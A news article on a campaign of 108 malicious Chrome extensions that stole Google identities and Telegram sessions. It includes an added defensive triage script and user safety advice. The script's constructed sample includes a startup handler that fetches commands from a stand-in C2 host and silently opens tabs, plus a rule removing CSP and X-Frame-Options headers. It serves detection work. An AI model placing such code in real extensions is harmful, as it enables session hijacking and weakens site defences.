108 malicious Chrome extensions steal data from 20,000 users
Cybersecurity researchers uncover coordinated campaign targeting Google accounts and Telegram sessions via Chrome Web Store.
MUMBAI: Chrome users just got a stark reminder that not every extension is an innocent add-on: some are quietly picking your digital pockets. Security firm Socket has uncovered a large-scale, coordinated campaign involving 108 malicious browser extensions on the Google Chrome Web Store. These extensions, which collectively racked up around 20,000 installs, posed as handy tools such as Telegram sidebar clients, text translators, and even slot machine-style games, while secretly stealing sensitive user data and hijacking sessions.
All 108 extensions were published under five seemingly distinct publisher identities, including Yana Project, Gamegen, and Rodeo Games, but covertly shared a single command-and-control (C2) infrastructure. According to Socket security researcher Kush Pandya, they routed stolen credentials, user identities, browsing data, and more to servers controlled by the same operator.
Particularly alarming, 54 of the extensions targeted Google account identities, harvesting users' email addresses and profile pictures through OAuth2 during sign-in attempts. Another 45 carried a universal backdoor: at browser startup they fetched instructions from a remote server and silently opened whatever URLs the attackers specified.
The most severe offender was the 'Telegram Multi-account' extension. It secretly extracted active Telegram Web authentication tokens and transmitted them to a remote server every 15 seconds. Because the token is the session itself, whoever holds it can read the victim's messages, contacts, and linked services without a password or a two-factor authentication code, and it keeps working until that session is terminated.
Five extensions went even further, using Chrome's declarativeNetRequest API to strip security headers from the responses of sites including YouTube and TikTok before the pages rendered, weakening the sites' built-in protections and enabling ad injection or the execution of injected code.
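Each of the behaviours described above leaves a trace in an extension's own files: the OAuth2 identity grab and the Telegram Web foothold show up in the manifest's permissions, the header stripping sits in the static declarativeNetRequest rule files, and the startup backdoor and the 15-second beacon are visible in the background script. The following triage script is an added example, not Socket's tooling and not code from any of the 108 extensions. The sample manifest, rule file and background script it runs on are constructed, and the permission heuristics (chrome.identity plus an oauth2 block, host access to web.telegram.org, the declarativeNetRequest permission) are assumptions about how such behaviour is usually implemented, not details taken from the report.

```javascript
'use strict';
// Added example, not Socket's tooling and not code from any of the 108 extensions: offline
// static triage of an unpacked Chrome extension for the behaviours described above. The
// sample manifest, rules and background script are constructed. Every check is a heuristic.

// Response headers whose removal weakens a site's own defences.
const SECURITY_HEADERS = new Set([
  'content-security-policy', 'x-frame-options', 'strict-transport-security',
  'x-content-type-options', 'cross-origin-opener-policy', 'cross-origin-embedder-policy',
  'cross-origin-resource-policy', 'referrer-policy', 'permissions-policy',
]);

// declarativeNetRequest static rules (the JSON files under declarative_net_request.rule_resources).
// A modifyHeaders action touching a security header on the response is flagged; blocking rules
// and request-header edits are left alone.
function findHeaderStrippingRules(rules) {
  const findings = [];
  for (const rule of rules) {
    if (!rule.action || rule.action.type !== 'modifyHeaders') continue;
    const touched = (rule.action.responseHeaders || [])
      .filter(h => SECURITY_HEADERS.has(String(h.header).toLowerCase()))
      .map(h => `${String(h.header).toLowerCase()}:${h.operation}`);
    if (touched.length) findings.push({ id: rule.id, urlFilter: (rule.condition || {}).urlFilter, headers: touched });
  }
  return findings;
}

// Manifest capabilities matching the reported behaviour. Assumption: the report does not list
// declared permissions; these are the usual routes to a Google identity, a Telegram Web
// foothold and header rewriting.
function triageManifest(manifest) {
  const perms = new Set([...(manifest.permissions || []), ...(manifest.optional_permissions || [])]);
  const hosts = [...perms, ...(manifest.host_permissions || [])].map(String);
  const flags = [];
  if (perms.has('identity') || manifest.oauth2) flags.push('google-oauth2-identity');
  if (hosts.some(h => /telegram\.org/i.test(h))) flags.push('telegram-web-host-access');
  if (perms.has('declarativeNetRequest') || perms.has('declarativeNetRequestWithHostAccess')) {
    flags.push('dnr-can-modify-headers');
  }
  return flags;
}

// Source patterns: a startup handler that fetches instructions and opens tabs (the "universal
// backdoor") and a timer firing at least once a minute (the 15-second token beacon).
// Regex over source is crude and does not see through minified or obfuscated code.
function scanBackgroundScript(src) {
  const hits = [];
  if (/chrome\.runtime\.onStartup/.test(src) && /\bfetch\s*\(/.test(src) &&
      /chrome\.tabs\.create\s*\(/.test(src)) {
    hits.push('remote-url-opener-on-startup');
  }
  const intervals = [...src.matchAll(/setInterval\s*\([\s\S]*?,\s*(\d+)\s*\)/g)].map(m => Number(m[1]));
  if (intervals.some(ms => ms <= 60000)) hits.push('short-interval-beacon:' + intervals.join(','));
  return hits;
}

function triageExtension({ manifest, rules, backgroundSource }) {
  return {
    manifestFlags: triageManifest(manifest),
    headerStripping: findHeaderStrippingRules(rules || []),
    backgroundHits: scanBackgroundScript(backgroundSource || ''),
  };
}

// Reads an unpacked extension directory: manifest.json, its rule files and its service worker.
function loadUnpacked(dir) {
  const fs = require('fs'), path = require('path');
  const read = p => fs.readFileSync(path.join(dir, p), 'utf8');
  const manifest = JSON.parse(read('manifest.json'));
  const rules = ((manifest.declarative_net_request || {}).rule_resources || [])
    .flatMap(r => JSON.parse(read(r.path)));
  const sw = manifest.background && manifest.background.service_worker;
  return { manifest, rules, backgroundSource: sw ? read(sw) : '' };
}

// Constructed sample (not a real listing) exhibiting all of the reported behaviours.
const SAMPLE_EXTENSION = {
  manifest: {
    manifest_version: 3, name: 'Sample multi-account helper', version: '0.1',
    permissions: ['identity', 'declarativeNetRequest', 'alarms'],
    host_permissions: ['https://web.telegram.org/*'],
    oauth2: { client_id: 'client-id.apps.googleusercontent.com', scopes: ['openid', 'email', 'profile'] },
    background: { service_worker: 'bg.js' },
    declarative_net_request: { rule_resources: [{ id: 'rules', enabled: true, path: 'rules.json' }] },
  },
  rules: [
    { id: 1, priority: 1, condition: { urlFilter: '||youtube.com', resourceTypes: ['main_frame', 'sub_frame'] },
      action: { type: 'modifyHeaders', responseHeaders: [
        { header: 'Content-Security-Policy', operation: 'remove' },
        { header: 'X-Frame-Options', operation: 'remove' }] } },
    { id: 2, priority: 1, condition: { urlFilter: '||tracker.example', resourceTypes: ['script'] },
      action: { type: 'block' } },  // an ordinary blocking rule is not flagged
  ],
  backgroundSource: `chrome.runtime.onStartup.addListener(async () => {
  const { url } = await (await fetch('https://c2.example/cmd')).json();  // remote instructions
  if (url) chrome.tabs.create({ url, active: false });                    // open silently
});
setInterval(() => { /* read the Telegram Web session and POST it */ }, 15000);`,
};

function triageSample() { return triageExtension(SAMPLE_EXTENSION); }

if (typeof require !== 'undefined' && require.main === module) {
  const target = process.argv[2] ? loadUnpacked(process.argv[2]) : SAMPLE_EXTENSION;
  console.log(JSON.stringify(triageExtension(target), null, 2));
}
```

Run it as `node triage.js <unpacked-extension-dir>` against an extension copied out of a Chrome profile, or with no argument to see the constructed sample produce all three manifest flags, the YouTube rule that removes Content-Security-Policy and X-Frame-Options, and both background hits. A hit is a reason to read the code, not a verdict: legitimate ad blockers declare declarativeNetRequest too, and a `setInterval` under a minute is common in harmless UI code. An empty `backgroundHits` is inconclusive, since the regexes do not survive minification or obfuscation.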
The campaign highlights the growing risks of browser-based threats, where seemingly legitimate extensions serve as stealthy vectors for data theft and account takeover in an era of instant digital convenience.
How to stay safe
Security experts recommend immediate action:
- Review and remove any suspicious installed extensions from Chrome settings.
- If you used Telegram-related extensions, log out of all active Telegram Web sessions via the ‘Devices’ section in the mobile app.
- If you signed in with Google credentials through any of these tools, treat the account as potentially compromised and revoke unfamiliar third-party access in your Google account settings.
In a world where extensions promise productivity or fun with just one click, this incident serves as a timely nudge: even the smallest add-ons can carry big risks. A quick spring clean of your browser could be the smartest security move you make today. Stay vigilant: your data is only as safe as the tools you trust.